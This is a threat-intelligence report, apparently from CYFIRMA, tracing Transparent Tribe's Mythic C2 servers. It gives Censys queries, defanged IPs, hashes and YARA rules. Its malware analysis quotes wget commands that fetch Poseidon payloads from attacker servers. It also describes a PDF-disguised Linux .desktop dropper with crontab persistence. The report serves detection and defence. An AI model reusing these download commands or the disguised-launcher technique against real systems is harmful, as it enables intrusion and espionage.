www.cyfirma.com Open in urlscan Pro
2606:4700:10::ac43:18d6  Public Scan

Form analysis
0 forms found in the DOM

Text Content

 * Company
 * Products
   
   PRODUCTS
   
    * DeCYFIRThreat Visibility and Intelligence
    * DeTCTDigital Risk Discovery
    * DeFNCECyber Defence Mobile App

 * Partners
   
   PARTNERS
   
    * Channel Partners
    * Technology Partners

 * Resources
   
   RESOURCES
   
    * Research
    * Blogs
    * Newsroom
    * Datasheets
    * Whitepapers
    * Case Studies

 * Get Started
 * Contact Sales

 * Global (English)


 * Global (English)


OSINT INVESTIGATION: HUNTING MALICIOUS INFRASTRUCTURE LINKED TO TRANSPARENT
TRIBE



Published On : 2024-09-27
Share :
 * 
 * 
 * 




EXECUTIVE SUMMARY

At CYFIRMA, we provide timely insights into emerging threats and malicious
tactics targeting organizations and individuals. This report details an
investigation aimed at tracking infrastructure linked to the APT group
“Transparent Tribe” and identified potential command-and-control (C2) servers
associated with this threat actor.

15 malicious hosts were identified – hosted by DigitalOcean – and the threat
actor was also found to be employing Linux desktop entry files as a novel attack
vector, targeting Individuals in India.

The report highlights the use of Mythic Poseidon binaries as C2 agents, and the
tactics used to evade security and maintain persistence, all of which underscore
the continued threat posed by Transparent Tribe and its evolving techniques.


INTRODUCTION

This open-source intelligence (OSINT) investigation seeks to expose the
infrastructure tied to the APT group “Transparent Tribe,” with a focus on
identifying command-and-control (C2) servers. The investigation was initiated
following a Twitter post from security researcher “@PrakkiSathwik,” which
flagged the IP addresses 206.189.134.185 and 143.198.64.151 as C2 servers linked
to the group.

We chose 143.198.64.151 as the primary pivot point for the investigation. The
IP, hosted by DigitalOcean under ASN AS14061, has been identified as a Mythic C2
server, running services on ports 22 (SSH), 80 (HTTP), and 7443 (HTTPS). Mythic
is a cross-platform, post-exploitation framework designed for red teaming but
has increasingly been misused by threat actors for malicious purposes. Its
collaborative, web-based interface and modular architecture allow attackers to
efficiently – and remotely – control compromised systems.

To further investigate this infrastructure, we used JARM – a tool that
fingerprints servers based on their TLS configurations – and HTML title metadata
to identify additional hosts running the Mythic C2 framework. We found that the
infrastructure consisted of 15 IPs, hosted on DigitalOcean, all linked to the
Mythic exploitation framework.

Our investigation also revealed that the attack campaign uses Linux desktop
entry files to deploy malicious payloads: these files, which were first seen
uploaded from India, suggest that the targets of this campaign are possibly
individuals within the region, which aligns with Transparent Tribe’s history of
targeting Indian government officials through phishing and other attack vectors.

In this report, we focus on tracing the malicious infrastructure while providing
insight into the deployment of Mythic agents and the tactics used by the threat
actor.


KEY POINTS

 * The report focuses on tracking the infrastructure of the APT group
   “Transparent Tribe” (APT36), identifying C2 servers.
 * The investigation was prompted by a Twitter post identifying two IPs linked
   to Transparent Tribe’s C2 servers. The servers are part of Mythic C2
   infrastructure, a cross-platform post-exploitation framework used for red
   teaming which is also abused by threat actors like Transparent Tribe for
   managing compromised systems.
 * The JARM fingerprinting technique initially identified 31,390 servers, which
   were narrowed down to 15 servers associated with the same malicious
   infrastructure. These servers, including the pivot IP 143.198.64.151, were
   found to be hosting Mythic C2 servers and linked to ongoing attacks utilizing
   customized payloads, such as the Poseidon agent, potentially targeting the
   Indian region.
 * The group is distributing malicious Linux desktop entry files disguised as
   PDFs. These files execute scripts to download and run malicious binaries from
   remote servers, establishing persistent access and evading detection.
 * APT36 is increasingly targeting Linux environments due to their widespread
   use in Indian government sectors, particularly with the Debian-based BOSS OS
   and the introduction of Maya OS.
 * This report outlines the infrastructure, methods, and tools used by APT36,
   providing insights into their Linux-based attack campaign and the evolving
   threat specifically to India.


ANALYSIS:

Basic Details:
Pivot Point IP: 143[.]198[.]64[.]151 (C2)

The objective of this OSINT investigation is to track the infrastructure
associated with the APT group “Transparent Tribe” and identify other potential
hosts or servers that may be functioning as C2 servers for this threat actor.

The investigation was initiated based on a Twitter post from a security
researcher; “@PrakkiSathwik,” who identified the IP addresses “206.189.134.185”
and “143.198.64.151” as C2 servers linked to the “Transparent Tribe” group.

Our investigation begins with the IP address “143.198.64.151” as the primary
pivot point.



The IP address has been flagged as malicious by multiple security solutions. The
server is associated with activity related to “MYTHIC,” a C2 server. Mythic C2
is a cross-platform, post-exploitation framework commonly used in red teaming
operations. It is designed to offer a collaborative, user-friendly interface for
operators, managers, and reporting, facilitating efficient coordination and
execution throughout red teaming engagements.



Our OSINT investigation reveals the IP address is linked to the hosting provider
“DigitalOcean” under ASN number “AS14061,” with the location identified as the
United States. The server is running services on ports 22/SSH, 80/HTTP, and
7443/HTTP.



We selected two key pivot points for further investigation based on the
available data: the “JARM” fingerprint and the “HTML Title” with the value
“Mythic.” JARM is a tool designed to fingerprint servers based on their TLS
configurations. It sends a series of unique requests to a server and analyzes
the responses to generate a fingerprint which can then be used to identify and
categorize servers, helping security teams detect malicious or suspicious
infrastructure. JARM aids in identifying servers that may be part of malicious
networks, command and control systems, or other harmful activities, even when
traditional indicators like IP addresses and domains change.



We constructed the following Censys query to hunt for servers/hosts with the
same JARM fingerprint:

services.jarm.fingerprint=”1dd40d40d00040d00042d43d000000831b6af40378e2dd35eeac4e9311926e”
.

This query led us to a total of 31,390 hosts.



The second attribute, “Mythic,” refers to the string found in the “HTML Title.”
We refined our query by combining both attributes:

services.jarm.fingerprint=”1dd40d40d00040d00042d43d000000831b6af40378e2dd35eeac4e9311926e”
and services.http.response.html_title=”Mythic”

This reduced the results to 63 hosts, providing a more focused list. However,
for further accuracy, we added a third pivot point: the hosting provider
“Digital Ocean.”



The final query, incorporating three attributes – JARM fingerprint, HTML Title,
and ASN Name – narrowed the results down to 15 hosts.

(services.jarm.fingerprint=”1dd40d40d00040d00042d43d000000831b6af40378e2dd35eeac4e9311926e”
and services.http.response.html_title=”Mythic”) and
autonomous_system.name=`DIGITALOCEAN-ASN`



The resultant 15 IPs are provided below:

 * 165[.]232[.]118[.]207
 * 161[.]35[.]186[.]219
 * 178[.]128[.]92[.]166
 * 64[.]23[.]155[.]109
 * 159[.]203[.]133[.]189
 * 138[.]197[.]156[.]131
 * 142[.]93[.]74[.]10
 * 143[.]198[.]64[.]151
 * 152[.]42[.]245[.]111
 * 139[.]59[.]109[.]136
 * 137[.]184[.]211[.]26
 * 159[.]223[.]0[.]196
 * 64[.]23[.]213[.]61
 * 152[.]42[.]198[.]168
 * 206[.]189[.]134[.]185

These IPs are part of a malicious infrastructure, hosting the open-source Mythic
exploitation framework, and serve as C2 servers for Mythic agents to execute
actions directed by the threat actor.

Many security solutions tagged these IPs as malicious and linked to “Mythic”
activity, indicating their involvement as a C2 server for the Mythic framework.



As mentioned earlier, Mythic is an open-source, cross-platform post-exploitation
framework, widely used for red teaming and offensive security operations. It is
built using Python3, Docker, and Docker-Compose, features a user-friendly
web-based interface, and is designed to support collaborative efforts among
operators, providing a centralized platform for managing compromised systems,
delivering payloads, and executing commands in a stealthy manner.

While Mythic is legitimate software intended for penetration testing and
red-teaming, it has also been co-opted by threat actors for malicious purposes.
In this context, the identified IPs are being utilized by adversaries to control
Mythic agents deployed on compromised systems, functioning as a C2 server to
execute commands and exfiltrate data.

The C2 panel for Mythic Poseidon is accessible via the URI path /new/login on
these server IPs at port 7443. For example, the C2 panel hosted on the server at
IP address 143[.]198[.]64[.]151 can be reached at
https[:]//143[.]198[.]64[.]151[:]7443/new/login.



And similarly IP address 165[.]232[.]118[.]207 and others can be reached at
https[:]//165[.]232[.]118[.]207[:]7443/new/login and
https[:]//Other_IP[:]7443/new/login.




ETLM ATTRIBUTION

The CYFIRMA research team is committed to the ongoing investigation of emerging
threats, malware, and the tactics, techniques, and procedures (TTPs) employed by
malicious actors. We continuously monitor current threats, track ongoing
campaigns, assess their evolution, and remain vigilant to new developments in
this ever-changing landscape.

We further continue our investigation into our starting IP “143.198.64.151”,
which appears to be part of a broader campaign where the threat actor uses Linux
desktop entry files as an attack vector. This method was first recorded in May
2023 by researchers and attributed to “Transparent Tribe” where they targeted
Indian government officials. A similar pattern is observed in this campaign,
involving the use of Linux desktop entry files and Mythic agent binaries. The
associated files, which were first seen/uploaded from India, suggest that the
campaign may be targeting individuals within the region.

Possibly the zip archive (Document Details.zip (md5:
01d9e52a4b38beb6541c5d3cae265a26)) containing malicious Linux desktop entry file
(Document Details.pdf.desktop (md5: e354cf4cc4177e019ad236f8b241ba3c)), is
distributed either through phishing emails or malicious websites.

ZIP archive:
Document Details.zip (md5: 01d9e52a4b38beb6541c5d3cae265a26)

Linux Desktop Entry File:
Document Details.pdf.desktop (md5: e354cf4cc4177e019ad236f8b241ba3c)

The Linux desktop entry file size exceeds 1 MB due to the addition of numerous
“#” characters, likely an attempt to evade security scans. The image below
highlights the extra characters in the inflated file.



Upon removing these extra “#” characters and blank spaces, we got the following
script:



The Linux desktop entry file is crafted to look like a legitimate PDF document
link but actually performs a series of malicious actions upon execution.

The icon set to “Icon=application-pdfName[en_US]=DocumentDetails.pdf” looks like
a legitimate PDF file. When the file is opened, it initiates a bash command that
first opens a PDF file hosted on Google Drive link
“https[:]//drive.google[.]com/file/d/1akF76sGydk2k-4tTDydq7T9WxMhoT-av/view?usp=sharing”
using xdg-open, which serves as a decoy to hide the real malicious activity.

Simultaneously, it creates a hidden directory (~/.local/share) on the system
where it downloads two malicious files (trs-clip and debian-clip) from two
remote servers (157[.]245[.]139[.]146 and 159[.]89[.]165[.]86) by using “wget”
command.

wget 157[.]245[.]139[.]146/trs-clip -O ~/.local/share/trs-clip
wget 159[.]89[.]165[.]86/debian-clip -O ~/.local/share/debian-clip

These files are given executable permissions, trs-clip runs in the background
and its output is redirected to a special directory /dev/null to suppress
visible output. Further, it runs the other file debian-clip. Next, the script
manipulates the crontab (a Linux scheduling tool) to ensure persistence. It adds
commands to the crontab that runs both the malicious scripts (trs-clip and
debian-clip) on system reboot. Finally, the file attempts to clean up traces of
its presence by removing temporary files.

The Linux desktop entry file downloads malicious payloads from the servers at IP
addresses:
157[.]245[.]139[.]146, 159[.]89[.]165[.]86.

We have checked our starting pivot point, the IP “143[.]198[.]64[.]151” and
identified the communicating file “debian-clip (md5:
242f77b4e65671a55e103b8b26df46a7)” communicating with this IP. Further analysis
identified these Linux payloads as Mythic Poseidon binaries.





Poseidon is a Golang-based agent that compiles executables for both Linux and
macOS x64 platforms. The malicious C2 infrastructure was identified as a result
of our OSINT investigation, rather than the technical analysis of the binaries.
For a detailed understanding of Poseidon’s functionality and capabilities, which
are well-documented in the open-source Mythic framework, you can refer to the
GitHub repository: https://github.com/MythicAgents/poseidon.

The use of Mythic as a C2 framework highlights the sophistication of the threat
actor behind this infrastructure. Mythic’s capabilities allow for highly
customizable payload delivery and interaction with compromised systems,
potentially enabling large-scale attacks and persistent access. The IPs we
identified during the investigation are associated with Mythic’s activity, which
suggests involvement in coordinated cyber operations, possibly involving
espionage, data theft, or other malicious actions.

Given the use of Linux desktop entry files, similar scripts, and tactics, the
deployment of the Mythic exploitation framework, and the Mythic Poseidon
binaries as Linux payloads observed in the Indian region we assess that this
campaign and its associated malicious infrastructure are linked to the APT group
‘Transparent Tribe.

Transparent Tribe (APT36):
Transparent Tribe, also known as APT36, is a suspected Pakistan-based threat
group that has been active since at least 2013. While not highly sophisticated,
the group is notably persistent and continually adapts its tactics. APT36
primarily targets Indian government officials, as well as the defense and
education sectors.

The group specializes in cyber espionage through credential harvesting and
malware distribution. APT36 frequently employs phishing emails and websites to
deliver malware, using customized RATs (Remote Access Trojans) and open-source
tools such as the Mythic framework. They have also been known to compromise
legitimate official applications to enhance their attacks.

APT36 is using malicious Linux binaries as attack vectors due to the widespread
use of Linux in the Indian government sector. The Debian-based BOSS OS is used
across various ministries and defense forces, creating a large target base.
Additionally, the Indian government’s introduction of Maya OS – a Debian-based
system, set to replace Windows in government and defense – presents a new
opportunity for nation-state actors like APT36 to expand their attacks by
targeting Linux environments.

Diamond Model:




CONCLUSION

This investigation successfully tracked and exposed malicious infrastructure
linked to the Transparent Tribe (APT36) group by leveraging OSINT techniques.
The report’s main objective is to hunt for C2 servers by pivoting on the flagged
IP-143[.]198[.]64[.]151, led to the identification of 15 additional servers
hosted by DigitalOcean. These servers were found to be part of a larger
infrastructure using the Mythic exploitation framework, a tool that facilitates
control over compromised systems.

The campaign’s use of Linux desktop entry files as an attack vector that focuses
on targeting individuals and systems within the Indian region, points to the use
of Mythic Poseidon binaries as payloads. By analyzing techniques, such as JARM
fingerprinting and HTML metadata, this investigation provided crucial insights
into the operational infrastructure of Transparent Tribe, enabling defenders to
understand the scope of their activities and identify patterns for future
detection.

The discovery of this infrastructure highlights the growing sophistication and
persistence of Transparent Tribe’s tactics, as they continue to adapt and expand
their capabilities. The insights gathered from this OSINT investigation will aid
in further monitoring and disrupting similar malicious infrastructures in the
future.


LIST OF IOCS

Sr No. Indicator Type Remarks 1 143[.]198[.]64[.]151 IP C2-Malicious
Infrastructure 2 165[.]232[.]118[.]207 IP C2-Malicious Infrastructure 3
161[.]35[.]186[.]219 IP C2-Malicious Infrastructure 4 178[.]128[.]92[.]166 IP
C2-Malicious Infrastructure 5 64[.]23[.]155[.]109 IP C2-Malicious Infrastructure
6 159[.]203[.]133[.]189 IP C2-Malicious Infrastructure 7 138[.]197[.]156[.]131
IP C2-Malicious Infrastructure 8 142[.]93[.]74[.]10 IP C2-Malicious
Infrastructure 9 143[.]198[.]64[.]151 IP C2-Malicious Infrastructure 10
152[.]42[.]245[.]111 IP C2-Malicious Infrastructure 11 139[.]59[.]109[.]136 IP
C2-Malicious Infrastructure 12 137[.]184[.]211[.]26 IP C2-Malicious
Infrastructure 13 159[.]223[.]0[.]196 IP C2-Malicious Infrastructure 14
64[.]23[.]213[.]61 IP C2-Malicious Infrastructure 15 152[.]42[.]198[.]168 IP
C2-Malicious Infrastructure 16 206[.]189[.]134[.]185 IP C2-Malicious
Infrastructure 17 242f77b4e65671a55e103b8b26df46a7 MD5 File Hash ELF-Binary
(Poseidon agent) 18 9d0f1c7825a207a2ad4acd0c9fece794 MD5 File Hash ELF-Binary
(Poseidon agent) 19 0d7b6773b8bbf9c000f2e4ff04c626e7 MD5 File Hash ELF-Binary
(Poseidon agent) 20 407ebc6e6d90bef35da9fe1062773543 MD5 File Hash ELF-Binary
(Poseidon agent) 21 d0a8e733d580fce3bbdad403bf9fd384 MD5 File Hash ELF-Binary
(Poseidon agent) 22 01d9e52a4b38beb6541c5d3cae265a26 MD5 File Hash Zip Archive
23 e354cf4cc4177e019ad236f8b241ba3c MD5 File Hash Linux Desktop Entry File 24
78604255c1386b1d62bd818a9c972e20 MD5 File Hash ELF-Binary 25
680619b5858b1a5f785c8af6065f6300 MD5 File Hash ELF-Binary


MITRE ATT&CK TTPS

No. Tactic Technique 1 Initial Access (TA0001) T1566: Phishing T1566.001: Spear
phishing Attachment 2 Execution (TA0002) T1059: User Execution T1204.002:
Malicious File T1059.004: Command and Scripting Interpreter 3 Persistence
(TA0003) T1547: Boot or Logon Autostart Execution 4 Defense Evasion (TA0005)
T1027: Obfuscated Files or Information T1564.001: Hide Artifacts: Hidden Files
and Directories T1070.004: Indicator Removal: File Deletion 5 Discovery (TA0007)
T1082: System Information Discovery T1083: File & Directory Discovery 6 Command
and Control (TA0011) T1071.001: Application Layer Protocol: Web Protocols T1113:
Screen Capture T1048: Exfiltration over Alternative Protocol


YARA RULES

import “hash”

rule TransparentTribe_Hashes_Detection {
meta:
description = “Detection of known hashes associated with Transparent Tribe”
author = “CRT”

condition:
hash.md5(0, filesize) == “242f77b4e65671a55e103b8b26df46a7” or
hash.md5(0, filesize) == “9d0f1c7825a207a2ad4acd0c9fece794” or
hash.md5(0, filesize) == “0d7b6773b8bbf9c000f2e4ff04c626e7” or
hash.md5(0, filesize) == “407ebc6e6d90bef35da9fe1062773543” or
hash.md5(0, filesize) == “d0a8e733d580fce3bbdad403bf9fd384” or
hash.md5(0, filesize) == “01d9e52a4b38beb6541c5d3cae265a26” or
hash.md5(0, filesize) == “e354cf4cc4177e019ad236f8b241ba3c” or
hash.md5(0, filesize) == “78604255c1386b1d62bd818a9c972e20” or
hash.md5(0, filesize) == “680619b5858b1a5f785c8af6065f6300”
}

import “network”
rule MaliciousInfra_IP_Detection {
meta:
description = “Detection of known IP addresses associated with Transparent
Tribe”
author = “CRT”

strings:
$ip1 = “143.198.64.151”
$ip2 = “165.232.118.207”
$ip3 = “161.35.186.219”
$ip4 = “178.128.92.166”
$ip5 = “64.23.155.109”
$ip6 = “159.203.133.189”
$ip7 = “138.197.156.131”
$ip8 = “142.93.74.10”
$ip9 = “152.42.245.111”
$ip10 = “139.59.109.136”
$ip11 = “137.184.211.26”
$ip12 = “159.223.0.196”
$ip13 = “64.23.213.61”
$ip14 = “152.42.198.168”
$ip15 = “206.189.134.185”

condition:
any of ($ip*)
}


RECOMMENDATIONS

 * Deploy strong endpoint security solutions equipped with advanced threat
   detection and prevention capabilities to effectively identify and stop
   malicious activities.
 * Keep operating systems, applications, and security software up to date with
   regular patches to mitigate known vulnerabilities frequently exploited by
   cyber threats.
 * Implement network segmentation to restrict lateral movement, preventing
   malware from reaching critical assets and containing potential threats within
   isolated areas.
 * Conduct comprehensive employee training on recognizing phishing threats,
   emphasizing the risks associated with opening attachments or clicking links
   in unsolicited emails.
 * Educate employees to identify social engineering tactics, empowering them to
   avoid falling prey to deceptive strategies that may lead to the execution of
   malicious files.
 * Configure firewalls to block outbound communication with known malicious IP
   addresses and domains associated with command-and-control servers.
 * Employ behavior-based monitoring to detect unusual activity patterns,
   including suspicious processes attempting unauthorized network connections.
 * Enforce application whitelisting policies to allow only approved
   applications, thereby preventing the execution of unauthorized or malicious
   executables.
 * Monitor network traffic for abnormal patterns, such as large data transfers
   to unfamiliar or suspicious IP addresses, indicating potential threats.
 * Develop a comprehensive incident response plan detailing necessary actions in
   the event of a malware infection, including isolating affected systems and
   promptly notifying relevant stakeholders.
 * Stay updated with the latest threat intelligence reports and indicators of
   compromise related to malware to proactively detect and mitigate potential
   threats.
 * Implement regular backups of critical data and systems to minimize the impact
   of ransomware attacks or data loss resulting from malware infections.
 * Follow the principle of least privilege (PoLP) by restricting user
   permissions to only those necessary for specific roles, reducing the impact
   of malware that relies on elevated privileges.
 * Establish and maintain defensive measures by monitoring and blocking
   Indicators of Compromise (IOCs), enhancing defenses based on tactical
   intelligence and provided rules.

Back to Listing
 * 
 * 
 * 

 * Company
 * Solutions
 * Takedown Services
 * Products
 * Partners
 * Resources
 * Careers
 * Privacy Policy

SINGAPORE

Hong Leong Building, 16 Raffles Quay, Floor #09-01 & #10-01, Singapore 048581

INDIA

Goodworks Co work, Plot no 72 and 73, 3rd Floor, Akshay Tech Park, EPIP Zone,
Whitefield, Bangalore, Karnataka.

JAPAN

Otemachi One Tower, 6th Floor, 1-2-1 Otemachi, Chiyoda-ku, Tokyo, 100-0004
Tokyo, Japan

USA

1123 BROADWAY STE 301, NEW YORK, NY 10010

GERMANY

Opernplatz 14, 60313 Frankfurt am Main

SOUTH KOREA

10F, 373 Gangnam-daero, Seocho-gu, Seoul, Korea 06621

AUSTRALIA

Suite 20, 270 Blackburn Road, Glen Waverley, VIC, 3150

TAIWAN

9F, Second Building, No.96, Sec. 2, Zhongshan N. Rd., Taipei, Taiwan

VIETNAM

14th Floor, HM Town building, 412 Nguyen Thi Minh Khai, Ward 5, District 3, Ho
Chi Minh City

DUBAI

Unit JLT-PH2-RET-5, Cluster R, Jumeirah Lakes Towers, Dubai, UAE

Copyright CYFIRMA. All rights reserved.

×

Your iFrame Code